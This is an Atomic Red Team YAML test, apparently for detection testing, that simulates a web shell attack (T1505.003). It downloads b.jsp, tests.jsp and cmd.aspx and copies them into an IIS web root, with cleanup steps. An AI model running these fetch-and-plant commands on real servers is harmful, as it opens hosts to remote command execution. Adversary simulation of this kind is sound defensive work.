Carrie Roberts
d4709021fb
* updating atomics count in README.md [ci skip] * wip * handle spaces in path * update readme * fix typo --------- Co-authored-by: publish bot <opensource@redcanary.com>
40 lines
1.7 KiB
YAML
40 lines
1.7 KiB
YAML
attack_technique: T1505.003
|
|
display_name: 'Server Software Component: Web Shell'
|
|
atomic_tests:
|
|
- name: Web Shell Written to Disk
|
|
auto_generated_guid: 0a2ce662-1efa-496f-a472-2fe7b080db16
|
|
description: |
|
|
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk.
|
|
Idea from APTSimulator.
|
|
cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
web_shell_path:
|
|
description: The path to drop the web shell
|
|
type: string
|
|
default: C:\inetpub\wwwroot
|
|
web_shells:
|
|
description: Path of Web Shell
|
|
type: path
|
|
default: PathToAtomicsFolder\T1505.003\src
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Web shell must exist on disk at specified location (#{web_shells})
|
|
prereq_command: |
|
|
if (Test-Path "#{web_shells}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory "#{web_shells}" -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp"
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx"
|
|
executor:
|
|
command: |
|
|
xcopy /I /Y "#{web_shells}" #{web_shell_path}
|
|
cleanup_command: |
|
|
del #{web_shell_path}\b.jsp /q >nul 2>&1
|
|
del #{web_shell_path}\tests.jsp /q >nul 2>&1
|
|
del #{web_shell_path}\cmd.aspx /q >nul 2>&1
|
|
name: command_prompt
|